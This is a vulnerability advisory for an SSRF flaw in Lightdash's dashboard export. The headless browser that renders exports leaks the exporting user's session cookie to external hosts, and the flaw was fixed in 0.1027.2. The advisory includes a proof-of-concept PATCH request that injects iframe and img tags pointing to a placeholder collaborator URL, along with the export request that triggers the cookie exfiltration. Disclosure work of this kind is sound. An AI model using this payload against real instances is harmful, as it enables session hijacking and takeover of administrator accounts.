Summary
Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When a dashboard containing HTML elements is exported, the rendering process issues HTTP requests to the external domain referenced by those elements, and those requests carry the exporting user’s session cookie. The cookie could be captured by a threat actor and used to hijack application user sessions.
Severity
HIGH - Exploitation of this vulnerability could lead to user session compromise and allow a threat actor to take over user sessions. If an administrative user is targeted, the threat actor could gain administrative control over the Lightdash instance.
Proof of Concept
Exploitation of this vulnerability requires a threat actor to inject HTML elements into a shared dashboard which point to a threat-actor-controlled source. Any user who exports the dashboard will leak their session token to the threat actor.
Instance 1: Dashboard Generate Preview
Affected Endpoint (Storage of HTML Injection Payload): PATCH /api/v1/dashboards/<DashboardIdentifier>
Affected Parameters (Storage of HTML Injection Payload): content (JSON value)
Affected Endpoint (SSRF Execution for Token Leakage): POST /api/v1/dashboards/<DashboardIdentifier>/export
Reproduction Steps:
- Log into the application with a user that has permissions to create a new dashboard
- Create a new markdown dashboard containing HTML injection payloads pointing to Burp Collaborator and save the dashboard
- Click on the “Export Dashboard” menu and click “Generate preview”.
- Wait for the preview to generate and observe an HTTP request to Burp Collaborator which contains the session cookie of the user who initiated the preview generation.
- Share the dashboard with a simulated victim user
- Log into the application as a simulated victim user and recreate the steps to generate a preview of the dashboard
- Wait for the preview to generate and observe that the simulated victim user’s session cookie was exfiltrated to Burp Collaborator.
A request to inject the required HTML elements is shown below.
PATCH /api/v1/dashboards/<DashboardIdentifier> HTTP/2
Host: lightdash-host
...
Priority: u=1, i
Cache-Control: no-transform
{"tiles":[{"uuid":"<UniqueIdentifier>","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"<iframe src=\"<Burp Collaborator URL>\">frame</iframe>\n\n<img src=\"<Burp Collaborator URL>\">img</img>\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"}
After the payload has been injected into a dashboard, exporting that dashboard will leak the session token of the exporting user to the injected source. An example HTTP request to export a dashboard is shown below.
POST /api/v1/dashboards/<DashboardIdentifier>/export HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"queryFilters":"","gridWidth":1400}
Further Analysis
A threat actor must be authenticated to the application and possess the necessary permissions to create or edit a shared dashboard and inject a payload. Any user exporting the dashboard will trigger the vulnerability and leak their session token. A threat actor could wait for a user to trigger the SSRF during organic application interaction or force the user to perform the action with cross-site scripting, as described in CVE-2024-6585.
Vendor Analysis
The vendor determined that the root cause of this issue was Puppeteer setting sensitive headers and cookies on the requests made by the headless browser. The issue was remediated in version 0.1027.2.
Remediation Information
Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1027.2
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9295.patch
GitHub Pull Request: lightdash/lightdash#9295
Timeline
Date reported: 03/07/2024
Date fixed: 03/08/2024
Date disclosed: 08/30/2024